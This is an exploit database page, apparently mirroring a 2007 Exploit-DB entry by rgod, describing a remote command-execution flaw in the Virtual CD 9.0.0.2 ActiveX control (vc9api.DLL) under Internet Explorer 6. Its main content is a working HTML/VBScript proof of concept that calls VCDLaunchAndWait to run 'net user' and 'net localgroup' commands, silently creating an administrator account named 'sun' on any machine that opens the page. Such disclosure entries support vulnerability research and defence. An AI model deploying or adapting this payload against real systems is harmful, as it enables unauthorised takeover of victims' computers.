header-logo
Suggest Exploit
vendor:
Virtual CD
by:
rgod
N/A
CVSS
HIGH
Remote Shell Commands Execution
Unknown
CWE
Product Name: Virtual CD
Affected Version From: Virtual CD 9.0.0.2 with vc9api.DLL version 9.0.0.57
Affected Version To: Virtual CD 9.0.0.2 with vc9api.DLL version 9.0.0.57
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

IE 6 / Virtual CD 9.0.0.2 (vc9api.DLL 9.0.0.57) remote shell commands execution exploit

This exploit allows an attacker to execute shell commands remotely on a system running IE 6 and Virtual CD 9.0.0.2 with vc9api.DLL version 9.0.0.57. The attacker can use this to add a new user 'sun' and add it to the 'Administrators' group using the 'net user' and 'net localgroup' commands.

Mitigation:

Update to a newer version of Virtual CD that does not have this vulnerability or apply patches if available.
Source

Exploit-DB raw data:

<!--
IE 6 / Virtual CD 9.0.0.2 (vc9api.DLL 9.0.0.57) remote shell commands execution exploit
by rgod
site: retrogod.altervista.org

software site: http://www.virtualcd-online.com/
-->
<html>
<object classid='clsid:C75848D7-72BD-499C-80F3-FD0ED62DF58C' id='VCDAPILibApi'></object>
<script language='vbscript'>

strCmd="cmd.exe /c net user sun tzu /add | net localgroup Administrators sun /add "
strWorkDir="c:\windows\system32\"
showCmd=1
bWait=1

VCDAPILibApi.VCDLaunchAndWait strCmd ,strWorkDir ,showCmd ,bWait

</script>
</html>

# milw0rm.com [2007-05-21]

Navigation

Suggest Exploit

Services By CQR